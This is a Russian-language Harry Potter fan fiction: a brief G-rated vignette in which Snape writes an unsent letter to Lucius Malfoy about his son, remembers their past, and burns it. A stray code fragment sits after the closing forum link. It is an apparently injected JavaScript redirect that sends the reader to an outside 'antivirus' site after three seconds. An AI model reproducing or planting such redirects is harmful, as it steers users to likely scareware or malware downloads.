Не в первый раз

Автор: Belegaer
Pairing: SS/LM
Rating: G
Категория: slash
Жанр: general. Это просто маленькая зарисовка.
Summary: История любви в одном письме. Одном из многих.
Архивация: пожалуйста, предупредите автора, если хотите разместить этот фик на другом сайте.

Для Рене, с благодарностью.

Сэр!

Я не в первый раз обращаюсь к Вам с письмом, дабы выразить обеспокоенность судьбой Вашего сына. Будучи его преподавателем и деканом факультета, где он учится, я имел возможность оценить его по достоинству. Его блестящие способности и личные качества позволяют надеяться, на самое блестящее будущее для него. Уже сейчас он демонстрирует острый ум, готовность занять место лидера и обаяние. Его происхождение обеспечит ему прекрасную карьеру. Я не сомневаюсь, что Вы и Ваша супруга…

Темноволосый мужчина остановился, пристально вглядываясь в последнюю фразу, перо в его руке дрогнуло. Он машинально потянулся к верхнему ящику стола. Там он хранил предмет, который не желал видеть, и от которого был не в силах избавиться.

Фотография, самая обычная фотография с великосветской свадьбы. Вечно повторяющийся краткий миг, пятнадцатилетней давности. Как старый шрам, который почти не болит, но мучительно ноет перед дождем, напоминая о себе предчувствием бури.

Пестрая толпа пышно одетых гостей. Они смеются, в воздух взлетают пригоршни цветочных лепестков. Улыбки, сияющие глаза. Великолепный фон для красивой пары на переднем фоне.

Невеста нежная и красивая как белая роза. Пепельные волосы, изысканно тонкие черты лица, бледный едва заметный румянец на щеках. Но розовые губы изогнулись в торжествующей, победной усмешке. Это ее день и свадебный букет в ее руках, это знамя триумфа. Она счастлива.

Жених, похож на великолепную ледяную статую, снежные волосы, морозно серые глаза. Но он тоже улыбается, и, сжимая локоть невесты, отвечает на приветствия гостей. Улыбка смягчает холод его идеально правильных черт. Он счастлив?

Черная тень позади жениха. Единственная совершенно неподвижная фигура на магической фотографии. Черная мантия, как ночь без просвета. Черные волосы, как траурное покрывало. Черные глаза, как бездонные непроницаемые для взгляда озера. Друг, стоящий позади счастливой пары. Друг оставленный позади. Семь лет дружбы оставшейся в прошлом. Все в прошлом. Все?

Люций, ты не хуже меня знаешь, что бывают обстоятельства, когда все это, происхождение, ум, красота, ломаного гроша не стоят. Твой сын так молод. В этом возрасте так легко совершить ошибку, которая приведет его в ловушку, из которой может спасти лишь чудо. Не в первый раз я и ты сталкиваемся с подобными ситуациями… Он снова остановился, перечитывая написанное, его правая рука машинально потирала запястье левой. Как будто в воспоминании о давней боли. Как будто пытаясь на ощупь отыскать зажившее, живой плотью затянувшееся клеймо. Его не видно, но оно там, и если дать ему повод оно проснется. Он помнит, как оно уходило.

Две пары глаз, угольно-черных и мглисто серых, две руки лежащие рядом, две Черных метки бледнеющих на глазах.

Перехваченный, хриплый до неузнаваемости голос.

- Он мертв. Через несколько часов об этом узнают все. У тебя еще есть время, не много от силы час. Если ты явишься в Министерство немедленно, то у тебя будет шанс убедить их, что ты был под Империо. Ты сумеешь их убедить, но только сейчас. Потом будет поздно. Я пришел, чтобы тебя предупредить… Поторопись если хочешь спастись…

Льдисто-серый взгляд. Молчание. В черных глазах ответ, о котором никогда не спросят.

Я сделаю все, чтобы защитить твоего сына. Я не в первый раз пишу тебе об этом. Он так похож на тебя. У него твои глаза и твоя улыбка.

Он это почти ты.

Ты это все, что у меня есть. Снег и лед, мрамор и жемчуг. Оникс и гагат, тьма и траур. Прошлое, которого уже нет. Грядущее, которого никогда не будет. Хрупкая действительность между пером и бумагой.

Люк, я люблю тебя. Крик, который никто не услышит. Не в первый раз.

Темноволосый мужчина аккуратно отложил перо. Еще раз пробежал взглядом по неровным строкам письма. Словам, наезжающим друг на друга. Незаконченным предложениям.

Затем он аккуратно сложил пергамент. Темный сургуч, капал как жгучие непролитые слезы. Печать со змеей обвивающей клинок, впилась в полузастывшую массу.

Не дрогнувшей рукой он надписал конверт.

Люцию Малфою, эсквайру.
Малфой-Менор, графство Сюррей, Англия.
Тонкая бледная рука уверенно привычно и спокойно водила пером. Не в первый раз.

А затем так же привычно, уверенно и спокойно швырнула запечатанный конверт в огонь.

Не в первый раз.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>